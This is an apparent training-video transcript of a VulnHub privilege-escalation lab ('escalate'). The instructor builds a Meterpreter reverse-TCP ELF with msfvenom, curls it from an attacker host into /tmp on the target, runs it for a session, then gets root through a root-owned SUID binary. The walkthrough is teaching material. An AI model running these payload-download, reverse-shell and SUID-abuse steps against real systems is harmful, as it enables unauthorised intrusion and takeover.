Privilege Escalation Walkthrough: Linux

Time
21 hours 43 minutes
Difficulty
Intermediate
CEU/CPE
22
Video Transcription
00:00
Welcome to part two of the privilege escalation lab. Now we're going to focus on the Linux box.
00:08
So I hinted that it is a web-based foothold.
00:12
So we'll just go to this in a browser.
00:16
192168
00:19
one
00:20
1- five. Now
00:22
the name of this box is escalate.
00:25
So it's a VulnHub box. If you want to
00:29
research this with other walkthroughs, I suggest that. I'm just gonna do one exploitation path
00:36
to get to root. There are apparently 11 others,
00:40
So try all 11 if you want to.
00:43
Um, but this is how you get better, right, through practice.
00:49
So, okay, so now I could use dirb on this.
00:56
dirb.
00:58
I told you I like to use WhatWeb to see the technology. Of course we already know this is Apache,
01:03
but still, WhatWeb.
01:10
Mhm.
01:11
See what we are.
01:18
Okay. Nothing, nothing earth-shattering here. We see it's Ubuntu.
01:25
So if I run dirb
01:34
and I specify for extension PHP
01:42
we see we have shell.php. Well, that makes things really easy.
01:49
Yeah,
01:53
So we're user6.
01:55
Okay, well let's get a foothold on this machine.
01:59
Okay. I said, I don't know, PHP shells aren't the best. So I'm gonna use msfvenom.
02:07
Payload is going to be Linux x86.
02:13
We can do Meterpreter. Let's mix things up here.
02:17
Reverse
02:19
TCP
02:21
LHOST
02:23
192.168.1.50
02:25
LPORT equals
02:30
4321
02:32
Format is ELF.
02:37
shell.elf.
02:43
So because I'm using Meterpreter, I now have to use
02:46
Metasploit
02:52
so I can split this.
02:54
I am going to do msfconsole
03:05
now if you use multi handler right.
03:09
use exploit/multi/handler
03:15
set
03:19
payload
03:27
set LHOST 192.168.1.
03:31
50, set LPORT
03:36
4321
03:43
show options
03:46
Looks right. You run and set this as a job in the background.
03:53
So now what I need to do again is set up my
04:00
little server here,
04:11
don't specify another port, you can do that.
04:14
So now it's on Port 8888.
04:17
So what I can do from here
04:23
is I can
04:26
make sure that.
04:29
Okay this is on the desktop
04:33
curl http
04:36
192.168.1.50
04:40
8888, shell
04:44
elf
04:45
output.
04:46
If you try to get this in this directory, it's not going to work. You don't have permission. So I always like to put things in /tmp
04:53
because it's globally readable, writable, executable. All right.
04:58
So first I have to ask that work
05:03
and we see the GET request here.
05:08
So if you want to verify that we of course can do
05:13
LS.
05:14
And we see
05:15
that it's there. We need to chmod this now
05:19
to let it execute: chmod 777.
05:24
Okay.
05:27
And now let's hope that
05:30
we can make this execute. It looks like it did.
05:34
All right.
05:39
So our sessions
05:44
session one.
05:46
Okay.
05:47
Let's drop into a shell.
05:49
Now you notice this is not the best shell in the world.
05:53
So what I want to do is /bin/bash -i
05:58
and that's much nicer isn't it?
06:00
So I want to look for SUID binaries. That's something that I like to do. I don't know what my password is, right? So if I do sudo -l,
06:10
well, it says no TTY present.
06:13
So
06:14
even if this looks nice, it's still a bad shell in my opinion.
06:17
Yeah,
06:17
but let's try to find SUID binaries
06:24
and this is how you do it
06:28
as SUID
06:30
type
06:31
F.
06:33
And again, I think the bible for this, or the manual, is g0tmi1k's
06:40
Linux privilege escalation guide.
06:53
We'll see something interesting towards the end here.
07:01
Okay. I see something called shell.
07:05
Is this a SUID binary?
07:08
And who owns it?
07:10
Yeah,
07:13
we see root owns this and we see a little s
07:15
here. Okay.
07:17
And we see that we can execute it.
07:21
So what if we do that?
07:40
You can always see what this is: file shell.
07:46
ELF.
07:46
do strings if you want,
07:50
see what's going on in here
08:03
and we can always run this.
08:09
And now we're root.
08:13
So that's only one way. There are many, many others. And I would highly recommend
08:18
that you explore all those other ways to escalate privileges on this box and that's why I chose it because there's just so many different ways to do it.
08:26
So go ahead and find your own way to get to root on this box.
08:31
Good luck.